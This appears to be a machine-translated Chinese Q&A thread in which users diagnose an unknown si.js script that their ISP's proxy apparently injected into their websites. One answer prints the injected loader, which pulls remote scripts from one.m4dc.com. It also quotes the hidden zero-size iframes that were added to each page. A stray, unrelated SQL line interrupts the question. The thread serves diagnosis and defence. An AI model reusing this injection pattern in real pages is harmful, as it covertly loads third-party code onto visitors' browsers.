我的项目中无法识别的JS脚本
我正在检查一个缓慢的加载页面,并在chrome的inspect network部分找到了这个si.js.有人可以帮我理解它是什么。我搜索了grid.js,找不到任何关于这个si.js的链接。 (仔细检查,我可以看到该页面正在重定向到另一个网站" http://one.m4dc.com/j/si.js"。感谢您的帮助
这是截图
更新! 如果你去浏览器网址,这就是我得到的../ js / grid.js
SELECT CAST(someNumberColumn AS INT) AS intColumn
}
但是实际脚本(在本地机器上类似于原始网站中的那个)
https://tympanus.net/Tutorials/ThumbnailGridExpandingPreview/js/grid.js
3 个答案:
答案 0 :(得分:3)
我也遇到了同样的问题。我刚发现这个脚本http://one.m4dc.com/j/si.js在我的网站上添加了Cookie
当我将ssl证书添加到我的网站时,问题实际上已得到解决。我发现服务器http://one.m4dc.com归
所有Bharthi airtel one.m4dc.com ip location info
我正在使用他们的宽带服务。看起来他们的代理服务器正在注入这个脚本。他们正在使用这个脚本用于恶意目的。
答案 1 :(得分:0)
我也遇到过这个问题。当我检查了所有脚本时,我网站上名为 pd-index.js 的脚本之一被替换为下面给出内容的脚本。
try {
var esdmd51 = '1f4c5553ab20a8809f7f1724448c2f6e';
var d = document;
var esdfd5_uri = 'http://www.plantondesk.com/js/pd-index.js?m4dc56=176712';
if(0 != e6f744) {
var e6f744 = 0;
esdfd5 =! 0
}
else esdfd5 =! 1;
function ldS(e,t) {
var a = d.createElement("script");
a.type = "text/javascript",
a.readyState
?a.onreadystatechange = function() {
"loaded"!=a.readyState && "complete" != a.readyState || (a.onreadystatechange=null,t())
}
:a.onload = function() {
t()
},
a.src = e,
d.getElementsByTagName("head")[0].appendChild(a)
}
try {
vA = d.currentScript.async,
vD = d.currentScript.defer
}
catch(e) {
vA =! 0
}
vA || vD
?ldS(esdfd5_uri, function(){})
:(
d.write('<script id="esdfd576712" type="text/javascript" src="'+esdfd5_uri+'" ><\/script>'),
d.getElementById("esdfd576712") || ldS(sdfd5_uri, function(){})),
esdfd5 && ldS("http://one.m4dc.com/j/si.js", function(){}
)
}
catch(e) {}
所有这些代码都写在一行中。我构造它是为了理解。我的两个站点在服务器上部署时遇到同样的问题。在本地运行时没问题。
它还将这两个div元素附加在每个页面的正文内容的末尾。
<div>
<iframe width="0px" height="0px" class="iifr" id="chk_frame" src="http://one.m4dc.com/i/si.html" frameborder="0" scrolling="no" allowtransparency="true"></iframe>
</div>
<div>
<iframe width="0px" height="0px" class="iifr" id="hdr_ifr" src="http://one.m4dc.com/t/?r=0.7112356815203629" frameborder="0" scrolling="no" allowtransparency="true"></iframe>
</div>
答案 2 :(得分:0)
如果你面临类似的问题,这对某些人可能会有所帮助。
我有一个类似的问题,一些未知的js文件被注入我的网站。我能够使用Chrome开发者工具确定来源。
在相应的注入JS文件行中查找启动器列。它将指向损坏/更改的JS文件。对我来说,它发生了多次,不确定确切的原因。由于我的系统是干净的恶意软件或广告软件。但是,当用新副本替换损坏的JS时,问题得到解决,或者如果它是库,则更好地与CDN一起使用。
- 我写了这段代码,但我无法理解我的错误
- 我无法从一个代码实例的列表中删除 None 值,但我可以在另一个实例中。为什么它适用于一个细分市场而不适用于另一个细分市场?
- 是否有可能使 loadstring 不可能等于打印?卢阿
- java中的random.expovariate()
- Appscript 通过会议在 Google 日历中发送电子邮件和创建活动
- 为什么我的 Onclick 箭头功能在 React 中不起作用?
- 在此代码中是否有使用“this”的替代方法?
- 在 SQL Server 和 PostgreSQL 上查询,我如何从第一个表获得第二个表的可视化
- 每千个数字得到
- 更新了城市边界 KML 文件的来源?